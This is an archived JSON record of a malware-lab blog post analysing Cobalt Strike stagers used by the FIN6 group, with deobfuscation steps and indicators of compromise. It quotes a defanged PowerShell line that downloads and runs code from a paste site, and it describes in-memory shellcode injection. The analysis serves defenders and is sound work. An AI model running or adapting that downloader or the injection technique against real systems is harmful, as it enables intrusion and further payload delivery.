{
	"id": "08a21d23-d7d0-480b-b611-12d1bec390a1",
	"created_at": "2026-04-10T03:21:52.280314Z",
	"updated_at": "2026-04-10T13:13:01.474863Z",
	"deleted_at": null,
	"sha1_hash": "2f8eef5a57271a957206b2a4c60a03bdba48748f",
	"title": "Cobalt Strike stagers used by FIN6 :: MWLab — Ladislav's Malware Lab",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 692236,
	"plain_text": "Cobalt Strike stagers used by FIN6 :: MWLab — Ladislav's\r\nMalware Lab\r\nPublished: 2020-07-07 · Archived: 2026-04-10 02:49:38 UTC\r\nIn June, LIFARS team worked on engagement related to FIN6 threat actor. FIN6 group was also detected and\r\ndescribed in April and May, by various other forensics firms, including SentinelOne and FireEye Managed\r\nDefense (Mandiant), which described intrusion by FIN6 threat actor and their latest tactics, techniques, and\r\nprocedures (TTPs). In particular, they used also LockerGoga and Ryuk ransomware families, and Cobalt Strike for\r\ninitial compromise and lateral movement. Even three months after publishing their post, some of the URLs for\r\nCobalt Strike stagers have been still active, so I decided to publish analysis of these Cobalt Strike stagers and\r\npayloads.\r\nCobalt Strike\r\nAs described on the Cobalt Strike’s website, it is “software for Adversary Simulations and Red Team Operations”.\r\nYes, it is a commercial tool with price $3,500 per user for one year and it is used by many pentesters and red\r\nteamers as well as by some of the advanced threat actors such as APT19, APT29, APT32, Leviathan, Cobalt\r\nGroup and FIN6. Again, official website says:\r\n“Cobalt Strike gives you a post-exploitation agent and covert channels to emulate a quiet long-term\r\nembedded actor in your customer’s network”.\r\nTherefore it is kind of more interesting malware than relatively common backdoors, rats and Metasploit.\r\nHttpsStagers\r\nThere are couple of IOCs in FireEye including links to the pastebin website. And some of these URLs are still\r\nactive in the time of writing this article, so let’s pick up one and look at it, e.g.\r\nhxxps://pastebin[.]com/raw/HPpvY00Q .\r\nFireEye mentions that “in some cases, the encoded PowerShell commands were used to download and execute\r\ncontent hosted on the paste site hxxps://pastebin[.]com.” And I can confirm, this is exactly what I saw during\r\nsome of cases I worked on. There were simple PowerShell downloaders in the form of encoded commands such as\r\nthe one on Figure 1.\r\nFig. 1: Example of encoded PowerShell downloader\r\nAfter decoding, it is pretty straigtforward: download string from pastebin and invoke expression:\r\nhttps://malwarelab.eu/posts/fin6-cobalt-strike/\r\nPage 1 of 4\n\nIEX ((new-object net.webclient).downloadstring('hxxps://pastebin[.]com/raw/HPpvY00Q'))\r\nNow, look at the content from the pastebin URL. It contains approximately 7kB large payload - again the\r\nexecution of encoded PowerShell command in hidden window.\r\nFig. 2: Payload downloaded from Pastebin\r\nAfter decoding, we get another long Base64-encoded string, this time, also gzipped. So the next steps are obvious:\r\ndecoding the Base64 and decompress GzipStream.\r\nFig. 3: Decoded Pastebin payload contains GZipStream encoded as Base64\r\nUsing Linux CLI tools, it can be done with one-liner echo \"...\" | base64 -d | gunzip . Finally, we can see\r\nsomething which looks like not-encoded PowerShell, but again, with one Base64-encoded string.\r\nhttps://malwarelab.eu/posts/fin6-cobalt-strike/\r\nPage 2 of 4\n\nFig. 4: Decoded and gunzipped payload with another Base64-encoded string\r\nReviewing the code from Figure 4, we can see that there is C# assembly which creates new namespace called\r\ninject and it is compiled in-memory. This namespace is wrapper for native functions VirtualAlloc ,\r\nCreateThread and WaitForSingleObject from kernel32.dll.\r\nThese functions are used for injecting the content of Base64-encoded string to the memory and executing it in a\r\nnew thread. Therefore, the Base64-encoded string (decoded $var_code ) contains shellcode.\r\nShellcode\r\nIn this article I will not dive too deeply into the shellcode analysis. Instead of it, a very simple approach such as\r\nstring extracion is just enough for revealing the some more IOCs and the essential purpose of the shellcode. So,\r\nlet’s do it. Again, Linux CLI tools can be very handy and echo \"...\" | base64 -d | strings (or strings -n\r\n7 ) does its job. We can see extracted strings in the Figure 5.\r\nFig. 5: Extracted strings from the shellcode\r\nThere is clearly readable User-Agent and IP address 185.202.174[.]91, thus this shellcode is probably another\r\ndownloader. And this hypothesis can be verified by analysing the shellcode in disassembler or debugger such as\r\nscdbg .\r\nClosing Notes\r\nThe Cobalt Strike HttpsStagers are used to delivery further payload to the victim computers. The extracted\r\nshellcode can download and execute another binary payload from Cobalt Strike servers. These servers are often\r\nlistening on the TCP port 50050, which is default port for Cobalt Strike Team servers used for cooperation of the\r\nattackers or pentesters.\r\nhttps://malwarelab.eu/posts/fin6-cobalt-strike/\r\nPage 3 of 4\n\nI also saw some HttpsStagers with one more obfuscation step in place - the shellcode in $var_code was xored\r\nwith an one-byte value, but this requires only one more step in the analysis process leading to the same results.\r\nFollowing the deobfuscation process from this analysis (multiple extraction and decoding of Base64-encoded\r\nstrings, gunzip decompression, strings extraction), we can create a recipe for CyberChef tool and automatize this\r\nprocess. Recipe from this article together with the content from the pastebin as an input data is available as this\r\nCyberChef Recipe.\r\nFig. 6: Analysis in CyberChef\r\nReferences\r\nhttps://lifars.com/2020/07/detecting-malware-capabilities-with-capa/\r\nhttps://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/\r\nhttps://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html\r\nhttps://www.cobaltstrike.com/\r\nhttps://attack.mitre.org/software/S0154/\r\nhttps://gchq.github.io/CyberChef/\r\nCyberChef Recipe\r\nSource: https://malwarelab.eu/posts/fin6-cobalt-strike/\r\nhttps://malwarelab.eu/posts/fin6-cobalt-strike/\r\nPage 4 of 4",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://malwarelab.eu/posts/fin6-cobalt-strike/"
	],
	"report_names": [
		"fin6-cobalt-strike"
	],
	"threat_actors": [],
	"ts_created_at": 1775791312,
	"ts_updated_at": 1775826781,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2f8eef5a57271a957206b2a4c60a03bdba48748f.pdf",
		"text": "https://archive.orkl.eu/2f8eef5a57271a957206b2a4c60a03bdba48748f.txt",
		"img": "https://archive.orkl.eu/2f8eef5a57271a957206b2a4c60a03bdba48748f.jpg"
	}
}